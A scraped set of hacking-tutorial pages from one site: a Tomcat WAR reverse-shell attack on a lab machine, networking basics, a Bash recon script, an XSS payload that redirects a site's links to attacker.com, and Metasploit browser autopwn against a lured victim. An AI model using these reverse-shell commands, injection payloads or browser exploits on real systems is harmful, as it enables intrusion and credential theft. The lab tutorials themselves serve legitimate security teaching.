was successfully opened. We now have a basic command shell and can run commands likeidanduname -ato verify we have compromised the target:~# id uid=110(tomcat55) gid=65534(nogroup) groups=65534(nogroup) ~# uname -a Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/LinuxWAR File BackdoorUsing Metasploit is easy, but it's not the only way to perform this exploit. We can upload a malicious WAR filemanuallyto get a better idea of what's going on under the hood. To begin, we can usemsfvenomto create our backdoor WAR file:~# msfvenom -p java/shell_reverse_tcp lhost=10.10.0.1 lport=4321 -f war -o pwn.war Payload size: 13395 bytes Final size of war file: 13395 bytes Saved as: pwn.warIn the above command, the-pflag specifies the payload,lhostis the IP address of our local machine,lportis the listening port on our machine, the-fflag specifies the desired format, and the-oflag is the name of the output file.Next, we need to log into Apache Tomcat. In the browser, go to the IP address of the target on port 8180, and we should see the Apache Tomcat welcome page:Next, click on the "Tomcat Manager" link, and we should be presented with an authentication form where we can log in using the default credentials we found earlier:Scroll down to the "Deploy" section, and browse to the WAR file we just created with msfvenom:Click the "Deploy" button, and we should be brought back to the top of the page. Now, all we have to do is click on the file we just deployed and our payload will run.But first, we need to set up a listener on our local machine.Netcatis always a good choice β€” just make sure to use the same port we specified earlier with msfvenom:~# nc -lvnp 4321 listening on [any] 4321 ...Finally, back in the Manager application, locate the name of the file we deployed and click on it:If everything worked properly, we should see a connection open on our Netcat listener:connect to [10.10.0.1] from (UNKNOWN) [10.10.0.50] 43521And again, we can issue commands likeidanduname -ato verify we have pwned the target, and we now have a shell as the tomcat55 user.~# id uid=110(tomcat55) gid=65534(nogroup) groups=65534(nogroup) ~# uname -a Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/LinuxAt this point, the next step would probably be attempting toescalate privilegesto fully compromise the system β€” and remember toupgrade this dumb shellto make things easier.Wrapping UpIn this tutorial, we learned a bit about Apache Tomcat and a vulnerability that allowed us to upload a malicious WAR file and get a shell. First, we enumerated the target with Nmap and found some valid credentials using a scanner. Then, we were able to exploit the vulnerability with both Metasploit and by manually uploading a WAR file backdoor. Often, when hacking or pentesting, the way to a shell is by abusing some functionality to do something unintended.Don't Miss:Identify Web Application Firewalls with Wafw00f & NmapWant to start making money as a white hat hacker?Jump-start your hacking career with our2020 Premium Ethical Hacking Certification Training Bundlefrom the newNull Byte Shopand get over 60 hours of training from cybersecurity professionals.Buy Now (90% off) >Other worthwhile deals to check out:97% off The Ultimate 2021 White Hat Hacker Certification Bundle99% off The 2021 All-in-One Data Scientist Mega Bundle98% off The 2021 Premium Learn To Code Certification Bundle62% off MindMaster Mind Mapping Software: Perpetual LicenseCover image byfrabre/Pixabay; Screenshots by drd_/Null ByteRelatedHack Like a Pro:Linux Basics for the Aspiring Hacker, Part 11 (Apache Web Servers)Hack Like a Pro:Using TFTP to Install Malicious Software on the TargetHack Like a Pro:How to Hack Web Apps, Part 7 (Finding Hidden Objects with DIRB)How To:Outsmart MiceHow To:Upload a Shell to a Web Server and Get Root (RFI): Part 1How To:Easily Find an Exploit in Exploit DB and Get It Compiled All from Your Terminal.How To:Linux Basics for the Aspiring Hacker: Configuring ApacheProtonMail 101:How to Make Images Show Up in Your Emails AutomaticallyNews:Hackers Have 92% Success Rate Hacking Gmail on AndroidHow To:Hack Your Kindle Touch to Get It Ready for Homebrew Apps & MoreHack Like a Pro:How to Spy on Anyone, Part 2 (Finding & Downloading Confidential Documents)How To:Protect Your Home from Mice for the WinterSEToolkit:Metasploit's Best FriendHack Like a Pro:How to Fingerprint Web Servers Using HttprintHack Like a Pro:How to Spear Phish with the Social Engineering Toolkit (SET) in BackTrackHow To:Run a Free Web Server From Home on Windows or Linux with ApacheGoodnight Byte:HackThisSite Walkthrough, Part 10 - Legal Hacker TrainingHow To:Turn Your House Lights On & Off Using the InternetNews:Flaw in Facebook & Google Allows Phishing, Spam & MoreHow To:Hack Anyone's Facebook, Twitter or YouTube Account with Your Android DeviceNews:The 5 Best iPhone/iPad Apps for Exporting and Importing Your PhotosHack Logs and Linux Commands:What's Going On Here?News:News Clips - June 6News:Easy Skype iPhone Exploit Exposes Your Phone Book & More
C/C++ for Hackers Β« Null Byte :: WonderHowTo
No content found.
Hack Like a Pro: Networking Basics for the Aspiring Hacker, Part 1 Β« Null Byte :: WonderHowTo
Welcome back, my greenhorn hackers!As expected with Null Byte's dramatic growth over the last year, we have added many new aspiring hackers who are still lacking in the basics of networking. In addition, with the new "White Hat" certifications coming out shortly, the exam will require some basic networking skills and knowledge to pass.As a result, I decided to offer my own take onnetworking basicsto make certain that everyone here has these basic skills down, which I consider foundation skills for hacking. In reality, without basic networking andLinux skills, hacking will certainly remain beyond your reach.I will attempt to address at least one basic networking skill ineach of these tutorials. In this one, I want to address some of the basics of IP addresses, NAT, DHCP, and ports.IP AddressesInternet Protocol addresses (IP addresses) makes the world go 'round. Or, at least, enable us to email, Skype, and navigate the web. It's almost as important as the world going around!Each digital device (computer, laptop, phone, tablet, etc.) is assigned an IP address, and this is what enables us to communicate and connect with it. Imagine an IP address as similar to your house address. Without that address, no one could find you and send you snail mail.The IP address system we are presently using is known as IP version 4, or IPv4 (we'll address the upcoming IPv6 in a coming tutorial). It is made up of 32 bits of four octets, or four groups of 8 bits (on/off switches).For instance, 192.168.1.101. Each of the numbers between the periods (.) is the decimal equivalent of 8 bits. This means that we calculate thebase 2number that computers use represented by the 8 bits and convert them to decimal numbers that humans are more accustomed to working with (see the diagram below). Each one of the octets (8 bits) is capable of representing numbers within the range 0 through 255 (2 to the 8th power).Classes of IP AddressesIP addresses are generally put into three classes, and the ranges are:Class A: 0.0.0.0 - 127.255.255.255Class B: 128.0.0.0 - 191.255.255.255Class C: 192.0.0.0 - 223.255.255.255In a future tutorial, we will address subnetting and subnet masks that vary with these different IP classes.Public vs. Private IP AddressesIt's important to note that our IP address system has its limitations. The biggest limitation is that there are not enough IP addresses to cover all of the devices that need to connect to the internet. The IPv4 system that we are working with now has only 4.3 billion IP addresses. With 7.3 billion people on the planet and far more devices, that certainly is not enough.As a result, a system was developed to reuse a group of IP addresses to be usedwithina LANβ€”and are not usable over the internet. These addresses can be used over and over again within each local area network, but not over the internet, thereby conserving the number of IP addresses necessary to keep the world going 'round.These private addresses include:192.168.0.0 - 192.168.255.25510.0.0.0 - 10.255.255.255172.16-.0.0 - 172.16.255.255You have probably seen the private IP addresses beginning with 192.168.xxx.xxx or 10.xxx.xxx.xxx on your Kali system when you typeifconfig.This is your private IP that is only usable on the local area network. To communicate over the internet, it must be translated to a public IP by a NAT device (see NAT below).DHCPDynamic Host Configuration Protocol (DHCP) assigns IP addresses dynamically. This means that you do not have the same IP address all of the time. Most of the time, these IP address assignments are on a local area network. Remember, on LANs we use private IP addresses. When each device is connected to the LAN, it must request an IP address. That device sends that request to the DHCP server that then assigns an IP address to that system for a fixed length of time known as a "lease."Each time you connect to the LAN, you are likely to receive a different (dynamic) IP address, but usually in the same range. For instance, 192.168.0.0 - 192.168.255.255.NATNetwork Address Translation (NAT) is protocol whereby internal private IP addresses are "translated" to an external public IP address that can be routed through the internet to its destination. Remember, private IP addresses of the systems inside the LAN cannot use their IP addresses on the internet because they are not unique (every LAN uses basically the same IP addresses inside their network).The NAT device accepts requests to traverse the internet from an internal machine. It then records that machine's IP address in a table and converts the IP address to the external IP address of the router. When the packet returns from its destination, the NAT device looks into its saved table of the original request and forwards on the packet to the internal IP address of the system that made the original request within the LAN. When working properly, the individual systems and users don't even realize this translation is taking place.For instance, the diagram above shows two phones with private IP addresses behind a device that is serving as both a NAT device and a router (not uncommon). The devices use their private IP addresses within the LAN, but when they want to communicate over the internet, the NAT device translates it to one of the public IP addresses that are unique on the internet. In this way, the routers along the way know exactly where to send the packets.PortsPorts are a kind of subaddress. The IP address is the primary address and the port is the subaddress. Using a well-worn, but effective metaphor, think of the IP address as the street address of a building and then the port as the apartment number. I need the street address to get to the right building, but I need the apartment address to find who I am looking for. This is the same with ports. The IP address gets us to right machine, but the port takes us to correct service, say HTTP on port 80.There are 65,536 (2 raised to the 16th power) ports. The first 1,024 are generally referred to as the common ports. People obviously don't remember all 65,536 ports (unless they are savant), or even the 1,024 most common ports. As a hacker, security engineer, and/or network engineer, though, there are a few ports that you should know by heart:20 FTP21 FTP22 SSH23 Telnet25 SMTP53 DNS69 TFTP80 HTTP88 Kerberos110 POP3123 NTP135 Microsoft's RPC137-139 Microsoft's NetBIOS143 IMAP161 SNMP389 LDAP443 HTTPS or HTTP over SSL445 SMB500 IKE514 syslog3389 RDPI will be following up withadditional tutorials on networkingsoon (with topics on subnetting, IPv6, TCP/IP, and more) in the near future, so keep coming back, my greenhorn hackers!Want to start making money as a white hat hacker?Jump-start your hacking career with our2020 Premium Ethical Hacking Certification Training Bundlefrom the newNull Byte Shopand get over 60 hours of training from cybersecurity professionals.Buy Now (90% off) >Other worthwhile deals to check out:97% off The Ultimate 2021 White Hat Hacker Certification Bundle99% off The 2021 All-in-One Data Scientist Mega Bundle98% off The 2021 Premium Learn To Code Certification Bundle62% off MindMaster Mind Mapping Software: Perpetual LicenseCover image viaShutterstockRelatedNews:How to Study for the White Hat Hacker Associate Certification (CWA)How To:The Essential Skills to Becoming a Master HackerHack Like a Pro:Linux Basics for the Aspiring Hacker, Part 11 (Apache Web Servers)Hack Like a Pro:Linux Basics for the Aspiring Hacker, Part 6 (Networking Basics)Hack Like a Pro:Networking Basics for the Aspiring Hacker, Part 2 (TCP/IP)Hack Like a Pro:Digital Forensics for the Aspiring Hacker, Part 2 (Network Forensics)Hack Like a Pro:Digital Forensics for the Aspiring Hacker, Part 11 (Using Splunk)Hack Like a Pro:Linux Basics for the Aspiring Hacker, Part 17 (Client DNS)Hack Like a Pro:Linux Basics for the Aspiring Hacker, Part 1 (Getting Started)Goodnight Byte:HackThisSite Walkthrough, Part 8 - Legal Hacker TrainingGoodnight Byte:HackThisSite Walkthrough, Part 6 - Legal Hacker TrainingCommunity Byte:HackThisSite Walkthrough, Part 1 - Legal Hacker TrainingCommunity Byte:HackThisSite Walkthrough, Part 2 - Legal Hacker TrainingCommunity Byte:HackThisSite Walkthrough, Part 10 - Legal Hacker TrainingCommunity Byte:HackThisSite Walkthrough, Part 6 - Legal Hacker TrainingGoodnight Byte:HackThisSite Walkthrough, Part 10 - Legal Hacker TrainingGoodnight Byte:HackThisSite Walkthrough, Part 9 - Legal Hacker TrainingGoodnight Byte:HackThisSite Walkthrough, Part 4 - Legal Hacker TrainingCommunity Byte:HackThisSite Walkthrough, Part 9 - Legal Hacker TrainingCommunity Byte:HackThisSite, Realistic 2 - Real Hacking SimulationsGoodnight Byte:HackThisSite Walkthrough, Part 5 - Legal Hacker TrainingCommunity Byte:HackThisSite Walkthrough, Part 5 - Legal Hacker TrainingHow To:The Official Google+ Insider's Guide IndexGoodnight Byte:HackThisSite, Realistic 3 - Real Hacking SimulationsGoodnight Byte:HackThisSite Walkthrough, Part 7 - Legal HackerCommunity Byte:HackThisSite, Realistic 3 - Real Hacking SimulationsCommunity Byte:HackThisSite, Realistic 5 - Real Hacking SimulationsCommunity Byte:HackThisSite, Realistic 4 - Real Hacking SimulationsHow To:Hack Wireless Router Passwords & Networks Using HydraTHE FILM LAB:Intro to Final Cut Pro - 02Community Byte:HackThisSite, Realistic 1 - Real Hacking SimulationsTHE FILM LAB:Non-Linear Editing Basics, Final Cut Pro - Part 01Community Byte:HackThisSite Walkthrough, Part 8 - Legal Hacker TrainingCommunity Byte:HackThisSite Walkthrough, Part 7 - Legal Hacker Training
How to Write Your Own Bash Script to Automate Recon Β« Null Byte :: WonderHowTo
Automation has been a buzz word for quite some time now, but the principles behind it are as strong as ever. For a hacker or pentester, Bash scripting is one form of automation that cannot be ignored. Virtually any command that can be run from the terminal can be scripted β€” and should be, in many cases β€” to save valuable time and effort. And a Bash script just happens to be great for recon.Step 1: Start the ScriptTo get started, create aBash scriptand name it whatever you like. I'll call minerecon.sh. Using your favoritetext editor, make the first line look like this:#!/bin/bashThis is called a shebang, or hashbang, and simply points to thesystem's interpreterforBash.Next, we'll make sure the user supplies input to the script, and if not, prints a usage example and exits. Use a conditional if-then block:if [ -z "$1" ] then echo "Usage: ./recon.sh <IP>" exit 1 fiThe$1is the argument we will pass to the script, and the-zoption returns true if the string is null. So basically, this says if no argument is passed, print the usage example and exit. The argument we'll use is an IP address.Step 2: Scan the HostThe next section will run anNmapscan on the host IP address we supply. First, we'll print a heading forNmapjust to keep things pretty and organized:printf "\n----- NMAP -----\n\n" > resultsWe useprintfhere because it handles newlines (\n) more reliably than echo. This is being written to a text file calledresultsβ€” it will first create the file since it doesn't exist yet, and it will overwrite the file in the future with subsequent scans.Next, we will print a message and actually run the command:echo "Running Nmap..." nmap $1 | tail -n +5 | head -n -3 >> resultsThenmapcommand takes the argument we supplied the script, the IP address, and appends the results to our output file. Thetailandheadcommands remove some lines from the beginning and end of theNmapoutput β€” this is just my personal preference and makes it look a little cleaner in my opinion.Recommended on Amazon:Cybersecurity Ops with Bash: Attack, Defend, and Analyze from the Command LineStep 3: Enumerate HTTPThe next section will take the results of the Nmap scan and attempt toenumerate HTTPif certain criteria are met. We will runGobusterto scan for directories andWhatWebto get some information about the web server.We'll use a while loop to read each line from our results file, and if it finds an open port running HTTP, it will kick off Gobuster and WhatWeb:while read line do if [[ $line == *open* ]] && [[ $line == *http* ]] then echo "Running Gobuster..." gobuster dir -u $1 -w /usr/share/wordlists/dirb/common.txt -qz > temp1 echo "Running WhatWeb..." whatweb $1 -v > temp2 fi done < resultsIf an open HTTP port is found, the code in the if-then block will run. Gobuster takes the IP address we supplied as the-uoption and uses awordlistspecified by the-woption. We will also use the-qand-zoptions here to disable the banner and hide the progress β€” again, just to keep the output tidy. This will write to a temporary file that will be utilized later in the script.WhatWeb simply takes the IP address we supplied and writes the output to a second temporary file. The-voption here gives us verbose results. When the while loop exhausts all lines of the results file, it completes, and the script moves on to the next section.Step 4: Display the ResultsThe next block of code will determine if the temporary files from earlier exist, and if so, will append the output to the main results file:if [ -e temp1 ] then printf "\n----- DIRS -----\n\n" >> results cat temp1 >> results rm temp1 fi if [ -e temp2 ] then printf "\n----- WEB -----\n\n" >> results cat temp2 >> results rm temp2 fiThe-eoption checks if the file exists β€” if it does, the code afterthenruns. It prints another heading, writes the contents of the temporary file to our results, and removes the temporary file.Finally, the last line of our script will simply display the results on our screen:cat resultsStep 5: Review the ScriptThe entire script should now look like this:#!/bin/bash if [ -z "$1" ] then echo "Usage: ./recon.sh <IP>" exit 1 fi printf "\n----- NMAP -----\n\n" > results echo "Running Nmap..." nmap $1 | tail -n +5 | head -n -3 >> results while read line do if [[ $line == *open* ]] && [[ $line == *http* ]] then echo "Running Gobuster..." gobuster dir -u $1 -w /usr/share/wordlists/dirb/common.txt -qz > temp1 echo "Running WhatWeb..." whatweb $1 -v > temp2 fi done < results if [ -e temp1 ] then printf "\n----- DIRS -----\n\n" >> results cat temp1 >> results rm temp1 fi if [ -e temp2 ] then printf "\n----- WEB -----\n\n" >> results cat temp2 >> results rm temp2 fi cat resultsStep 6: Run the ScriptNow we should be ready to run our recon script. In my example, I'm usingMetasploitable 2as the target.First, make the script executable:~# chmod +x recon.shIf we try to run it without an argument, it gives us the usage example:~# ./recon.sh Usage: ./recon.sh <IP>Simply supply the IP address and run it again:~# ./recon.sh 10.10.0.50 Running Nmap... Running Gobuster... Running WhatWeb... /usr/lib/ruby/vendor_ruby/target.rb:188: warning: URI.escape is obsolete ----- NMAP ----- PORT STATE SERVICE 21/tcp open ftp 22/tcp open ssh 23/tcp open telnet 25/tcp open smtp 53/tcp open domain 80/tcp open http 111/tcp open rpcbind 139/tcp open netbios-ssn 445/tcp open microsoft-ds 512/tcp open exec 513/tcp open login 514/tcp open shell 1099/tcp open rmiregistry 1524/tcp open ingreslock 2049/tcp open nfs 2121/tcp open ccproxy-ftp 3306/tcp open mysql 5432/tcp open postgresql 5900/tcp open vnc 6000/tcp open X11 6667/tcp open irc 8009/tcp open ajp13 8180/tcp open unknown ----- DIRS ----- /.hta (Status: 403) /.htaccess (Status: 403) /.htpasswd (Status: 403) /.bash_history (Status: 200) /cgi-bin/ (Status: 403) /dav (Status: 301) /phpMyAdmin (Status: 301) /index (Status: 200) /index.php (Status: 200) /test (Status: 301) /twiki (Status: 301) /phpinfo (Status: 200) /phpinfo.php (Status: 200) ----- WEB ----- WhatWeb report for http://10.10.0.50 Status : 200 OK Title : Metasploitable2 - Linux IP : 10.10.0.50 Country : RESERVED, ZZ Summary : WebDAV[2], X-Powered-By[PHP/5.2.4-2ubuntu5.24], Apache[2.2.8], PHP[5.2.4-2ubuntu5.24], HTTPServer[Ubuntu Linux][Apache/2.2.8 (Ubuntu) DAV/2] Detected Plugins: [ Apache ] The Apache HTTP Server Project is an effort to develop and maintain an open-source HTTP server for modern operating systems including UNIX and Windows NT. The goal of this project is to provide a secure, efficient and extensible server that provides HTTP services in sync with the current HTTP standards. Version : 2.2.8 (from HTTP Server Header) Google Dorks: (3) Website : http://httpd.apache.org/ [ HTTPServer ] HTTP server header string. This plugin also attempts to identify the operating system from the server header. OS : Ubuntu Linux String : Apache/2.2.8 (Ubuntu) DAV/2 (from server string) [ PHP ] PHP is a widely-used general-purpose scripting language that is especially suited for Web development and can be embedded into HTML. This plugin identifies PHP errors, modules and versions and extracts the local file path and username if present. Version : 5.2.4-2ubuntu5.24 Google Dorks: (2) Website : http://www.php.net/ [ WebDAV ] Web-based Distributed Authoring and Versioning (WebDAV) is a set of methods based on the Hypertext Transfer Protocol (HTTP) that facilitates collaboration between users in editing and managing documents and files stored on World Wide Web servers. - More Info: http://en.wikipedia.org/wiki/WebDAV Version : 2 [ X-Powered-By ] X-Powered-By HTTP header String : PHP/5.2.4-2ubuntu5.24 (from x-powered-by string) HTTP Headers: HTTP/1.1 200 OK Date: Wed, 19 Jun 2019 18:03:39 GMT Server: Apache/2.2.8 (Ubuntu) DAV/2 X-Powered-By: PHP/5.2.4-2ubuntu5.24 Connection: close Transfer-Encoding: chunked Content-Type: text/htmlIt tells us what's running (ignore the ruby error for WhatWeb) and prints out a nice display of the results when it is done.Expanding the ScriptIn its current state, this Bash script isn't complicated. It runs an Nmap scan, and if an open HTTP port is found, it kicks off Gobuster and WhatWeb. While useful, this could be expanded in many ways.First of all, we're only running a basic Nmap scan. We could scan additional ports, run thedefault scripts, enable OS detection, and more. Basically, anything you can do from the command line you can put in the script. The same thing goes for Gobuster and WhatWeb.We could also expand the script to enumerate other services besides HTTP. Things likeSMB,SSH, andFTPcould all be good candidates to add in there. Again, Bash scripting is powerful because it is possible toautomatemany of the functions typically used in a command-line form.Wrapping UpIn this tutorial, we created a Bash script to automate some of the activities used in the reconnaissance phase of a penetration test. The script took an IP address as an argument, ran an Nmap scan on the target, and if an open HTTP port was found, kicked off Gobuster and WhatWeb. Bash Scripting is extremely powerful, and even this simple script saved us a ton of time and typing.Don't Miss:How Hackers Cover Their Tracks on an Exploited Linux Server with Shell ScriptingWant to start making money as a white hat hacker?Jump-start your hacking career with our2020 Premium Ethical Hacking Certification Training Bundlefrom the newNull Byte Shopand get over 60 hours of training from cybersecurity professionals.Buy Now (90% off) >Other worthwhile deals to check out:97% off The Ultimate 2021 White Hat Hacker Certification Bundle99% off The 2021 All-in-One Data Scientist Mega Bundle98% off The 2021 Premium Learn To Code Certification Bundle62% off MindMaster Mind Mapping Software: Perpetual LicenseCover image byStockSnap/Pixabay; Screenshots by drd_/Null ByteRelatedDon't Be a Script-Kiddie part2:Building an Auto-Exploiter Bash ScriptHow To:Evil-Twin (Part 1) - Setting Up the Dhcp Server.How To:Using BASH for Computer ForensicsHack Like a Pro:Scripting for the Aspiring Hacker, Part 1 (BASH Basics)Don't Be a Script-Kiddie part1:Introduction to Shell ScriptHow To:A Simple Virus Written...in Bash!Hacking macOS:How to Steal Signal Conversations from a MacBook with a USB Rubber DuckyHow To:Brute-Force Email Using a Simple Bash Script (Ft. THC Hydra)Hack Like a Pro:Reconnaissance with Recon-Ng, Part 1 (Getting Started)Hack Like a Pro:Using the Nmap Scripting Engine (NSE) for ReconnaissanceHow To:Automate Hacking on the Raspberry Pi with the USB Rubber DuckyHow To:Create a Persistent Back Door in Android Using Kali Linux:How To:Get Started Writing Your Own NSE Scripts for NmapHow To:How One Man's Python Script Got Him Over 20,000 Karma on Redditβ€”Without CheatingHow To:Become a Productivity Master with Google Apps ScriptHow To:Automate Remote SSH Control of Computers with Expect ScriptsHow To:Automate web testing with PAMIEHow to Train Your Python:Part 16, Basic File Input and OutputHow To:Bash (Shell) Scripting for BeginnersHow To:Script Writing Basics How to Structure a Film Script lNews:The Money Making MacroWeekend Homework:How to Become a Null Byte Contributor (3/2/2012)News:Null Byte Is Calling for Contributors!How To:Enable Code Syntax Highlighting for Python in the Nano Text EditorForbes Exploited:XSS Vulnerabilities Allow Phishers to Hijack Sessions & Steal LoginsNews:Change from BASH to zshNews:Asteroids
XSS Bonuses Β« Null Byte :: WonderHowTo
This is a followup from my recent series on XSS exploitation, giving a few extra attacks/tricks to try.Google's PrankGoogle developed a JavaScript code (availablehere) that you can customize. Basically, it makes all the elements on the page swirl around, fade out to white, and pretends to hack you. Customize it to your own liking.Password StealerMartani Fyssal, a Microsoft developer, created a JavaScript code that steals passwords. You can download ithere.Changing DownloadUsing this code, you can change the download reference for a website.index.php?name=<script>window.onload = function() {var link=document.getElementsByTagName("a");link0. href="http://attacker.com";}</script>Just make sure you change the respective variables.Credits to Ramesh Natarajan.Persistent ConnectionsAgain by Ramesh, these are two PHP scripts that create a persistent connection.login.phphome.phpChange what you want.ThanksI'd like to thank the many people who help me study, from the members of C3, to the many pentesters online to take their time to share their knowledge. You guys help keep me going. Many thanks to Ramesh Natarajan for his amazing scripts and his wonderful sharing. And of course, thank you all for keeping this community alive.C|H of C3Want to start making money as a white hat hacker?Jump-start your hacking career with our2020 Premium Ethical Hacking Certification Training Bundlefrom the newNull Byte Shopand get over 60 hours of training from cybersecurity professionals.Buy Now (90% off) >Other worthwhile deals to check out:97% off The Ultimate 2021 White Hat Hacker Certification Bundle99% off The 2021 All-in-One Data Scientist Mega Bundle98% off The 2021 Premium Learn To Code Certification Bundle62% off MindMaster Mind Mapping Software: Perpetual LicenseRelatedHow To:Hack a remote Internet browser with XSS ShellHow To:Advanced Techniques to Bypass & Defeat XSS Filters, Part 1How To:Discover XSS Security Flaws by Fuzzing with Burp Suite, Wfuzz & XSStrikeHow To:BeEF - the Browser Exploitation Framework Project OVER WANHow To:Hack websites using cross-site scripting (XSS)Exploiting XSS with BeEF:Part 3How To:Is Your Website Vulnerable to XSS Injections? Here's How to Protect Your VisitorsHow To:How Cross-Site Scripting (XSS) Attacks Sneak into Unprotected Websites (Plus: How to Block Them)News:Easy Skype iPhone Exploit Exposes Your Phone Book & MoreForbes Exploited:XSS Vulnerabilities Allow Phishers to Hijack Sessions & Steal LoginsNews:Making the most of the bonuses!News:Free Bonus Game CheckerNews:AnimalsExploiting XSS with BeEF:Part 1News:Automated Bonuses And Gifts Are Finally Here!News:Expert tipsGoal:ChickensNews:All Entries in one placeNews:The Fly TrapHow To:CityVille Guide - Strategies and Secrets to help you succeed!How To:A Beginners GuideNews:Saint's Row 3 Professor Genki TrailerHow To:Learn how to use Reason with Cubase using rewireIndie Game:The MovieNews:FarmVille McDonald's PromotionNews:ForecastNews:Random Tuesday
Hack Like a Pro: Metasploit for the Aspiring Hacker, Part 7 (Autopwn) Β« Null Byte :: WonderHowTo
Welcome back, my novice hackers!In thiscontinuing series on Metasploit basics, let's next look at a module that many aspiring hackers find usefulβ€”autopwn.Generally, when we are trying to hack a target, we want to know as much as possible about the target throughreconnaissance. Then, and only then, can we choose an appropriate exploit. We should know the operating system, the applications, the browser, the version of Java and Flash, etc. It's tedious, but necessary work. Using a Java exploit when a Flash exploit is called for simply won't work and might land you behind bars.The beauty of autopwn is that it relieves you of some of thehard workof reconnaissance. Autopwn will first try to fingerprint the victim's browser, then "throw" at it whatever exploits it thinks might work. It makes life quite simple. The downside of autopwn is that it isverynoisy and can lead to either detection by the target or crashing the browser, which happens often.Let's take a look at it now.Step 1: Fire Up Kali & Open MetasploitLet's fire upKaliand startMetasploitwith the command:kali > msfconsoleStep 2: Use AutopwnTo get started with any exploit, generally we start with theusecommand. Since the autopwn module is located atauxiliary/server/browser_autopwn, we get started by typing:msf> use auxiliary/server/browser_autopwnThis will load the module. Then, to get more information on this module, let's type:msf > auxiliary(browser_autopwn) > infoAs you can see in the screenshots above and below, this provides us with all the information we need to get started, including each of the options and a brief description of the module.Step 3: Show and Set OptionsNext, like nearly all the Metasploit modules, we need to ask it to show us the options.msf > show optionsAs you can see, we need to set:LHOSTURIPATHThe LHOST is the local host. In other words , our Kali attack system. Since mine is at 192.168.1. 106, I type:msf > set LHOST 192.168.1.106Now we need to create a URIPATH. This is the URL that we want the exploits to be located at on our malicious server. We can call it anything we want or we could leave it blank and Metasploit will set it to a default string. Since we are trying to entice our victim to click on this link, let's try to make it inviting and use the name of our favorite hacker training site, Null Byte.msf > set URIPATH null_byteTo get started, that's all we need to set.Step 4: ExploitFinally, let's type exploit:msf > exploitThis will start the autopwn module. It starts numerous servers and then loads the exploits thatmaywork against that browser. Each one represents a different possible vulnerability in our browser. Be patient as this takes awhile.Notice in the middle of the above screenshot that it loaded 20 exploit modules.Step 5: Browse to the ServerNow from a Windows 7 system with Internet Explorer 9, when the target navigates to our webserver at192.168.1.106:8080/null_byte, they will get this warning from IE:Back on our Kali system, autopwn is fingerprinting the browser and trying to determine which of the exploits will work.Note in the middle of this screenshot that autopwn is "responding with 13 exploits." It will now begin trying each of those exploits against the browser with the hope that at least one will work.Step 6: Check Your SessionsFinally, let's go back to our Kali system and see whether any sessions have opened by typing:sessions -lWhen we do, Metasploit will list all our active sessions. Looks like I only have one.To connect to thatmeterpretersession, we simply type:sessions -i 1Where 1 is the ID of our session from the previous command. (See it to the far left column?) This will then connect me to my meterpreter connection that looks like this:meterpreter >This is my direct connection into the Windows 7 machine. When I type:meterpreter > shellit drops me into a Windows command prompt shell like below.Depending upon the browser and its configuration, you might get several meterpreter sessions, you might get one like I did, or you might get none. In the worst case, all of the exploits running against the browser can crash the browser.Although autopwn is a good Metasploit training tool, it is less than stealthy and often will overwhelm the browser with exploits and crash it. Keep coming back, my novice hackers, as we explore the inner workings my favorite hacking tool,Metasploit!Want to start making money as a white hat hacker?Jump-start your hacking career with our2020 Premium Ethical Hacking Certification Training Bundlefrom the newNull Byte Shopand get over 60 hours of training from cybersecurity professionals.Buy Now (90% off) >Other worthwhile deals to check out:97% off The Ultimate 2021 White Hat Hacker Certification Bundle99% off The 2021 All-in-One Data Scientist Mega Bundle98% off The 2021 Premium Learn To Code Certification Bundle62% off MindMaster Mind Mapping Software: Perpetual LicenseRelatedNews:How to Study for the White Hat Hacker Associate Certification (CWA)How to Hack Like a Pro:Getting Started with MetasploitHack Like a Pro:How to Exploit and Gain Remote Access to PCs Running Windows XPHack Like a Pro:Metasploit for the Aspiring Hacker, Part 14 (Creating Resource Script Files)Hack Like a Pro:Metasploit for the Aspiring Hacker, Part 4 (Armitage)Hack Like a Pro:Metasploit for the Aspiring Hacker, Part 1 (Primer & Overview)How To:The Essential Skills to Becoming a Master HackerHack Like a Pro:Metasploit for the Aspiring Hacker, Part 8 (Setting Up a Fake SMB Server to Capture Domain Passwords)Hack Like a Pro:Metasploit for the Aspiring Hacker, Part 13 (Web Delivery for Windows)Hack Like a Pro:Metasploit for the Aspiring Hacker, Part 10 (Finding Deleted Webpages)Hack Like a Pro:Metasploit for the Aspiring Hacker, Part 6 (Gaining Access to Tokens)Hack Like a Pro:Metasploit for the Aspiring Hacker, Part 2 (Keywords)Hack Like a Pro:Metasploit for the Aspiring Hacker, Part 11 (Post-Exploitation with Mimikatz)Hack Like a Pro:How to Remotely Install a Keylogger onto Your Girlfriend's ComputerHack Like a Pro:Metasploit for the Aspiring Hacker, Part 9 (How to Install New Modules)Hack Like a Pro:Metasploit for the Aspiring Hacker, Part 3 (Payloads)Mac for Hackers:How to Install the Metasploit FrameworkHack Like a Pro:Metasploit for the Aspiring Hacker, Part 5 (Msfvenom)SEToolkit:Metasploit's Best FriendHack Like a Pro:Linux Basics for the Aspiring Hacker, Part 11 (Apache Web Servers)Hack Like a Pro:How to Use Hacking Team's Adobe Flash ExploitNews:What to Expect from Null Byte in 2015Hack Like a Pro:Getting Started with BackTrack, Your New Hacking SystemHack Like a Pro:Hacking Samba on Ubuntu and Installing the MeterpreterGoodnight Byte:HackThisSite, Realistic 3 - Real Hacking SimulationsCommunity Byte:HackThisSite, Realistic 3 - Real Hacking SimulationsCommunity Byte:HackThisSite, Realistic 5 - Real Hacking SimulationsCommunity Byte:HackThisSite, Realistic 4 - Real Hacking SimulationsCommunity Byte:HackThisSite, Realistic 2 - Real Hacking SimulationsCommunity Byte:HackThisSite, Realistic 1 - Real Hacking SimulationsCommunity Byte:HackThisSite Walkthrough, Part 9 - Legal Hacker TrainingCommunity Byte:HackThisSite Walkthrough, Part 2 - Legal Hacker TrainingGoodnight Byte:HackThisSite Walkthrough, Part 8 - Legal Hacker TrainingCommunity Byte:HackThisSite Walkthrough, Part 1 - Legal Hacker Training
How to Get Free Netflix for Life Β« Null Byte :: WonderHowTo
